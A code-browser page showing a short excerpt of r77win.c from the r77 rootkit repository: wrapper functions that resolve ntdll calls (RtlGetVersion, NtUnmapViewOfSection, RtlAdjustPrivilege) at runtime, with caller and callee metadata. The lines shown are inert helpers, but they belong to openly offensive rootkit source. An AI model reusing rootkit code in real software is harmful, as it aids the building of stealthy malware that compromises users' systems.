MCPcopy Create free account
hub / github.com/bytecode77/r77-rootkit / R77_RtlGetVersion

Function R77_RtlGetVersion

r77api/r77win.c:941–944  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

939 return ((NT_NTUNMAPVIEWOFSECTION)GetFunction("ntdll.dll", "NtUnmapViewOfSection"))(processHandle, baseAddress);
940}
941NTSTATUS NTAPI R77_RtlGetVersion(PRTL_OSVERSIONINFOW versionInformation)
942{
943 return ((NT_RTLGETVERSION)GetFunction("ntdll.dll", "RtlGetVersion"))(versionInformation);
944}
945NTSTATUS NTAPI R77_RtlAdjustPrivilege(ULONG privilege, BOOLEAN enablePrivilege, BOOLEAN isThreadPrivilege, PBOOLEAN previousValue)
946{
947 return ((NT_RTLADJUSTPRIVILEGE)GetFunction("ntdll.dll", "RtlAdjustPrivilege"))(privilege, enablePrivilege, isThreadPrivilege, previousValue);

Callers 1

IsAtLeastWindows10Function · 0.85

Calls 1

GetFunctionFunction · 0.85

Tested by

no test coverage detected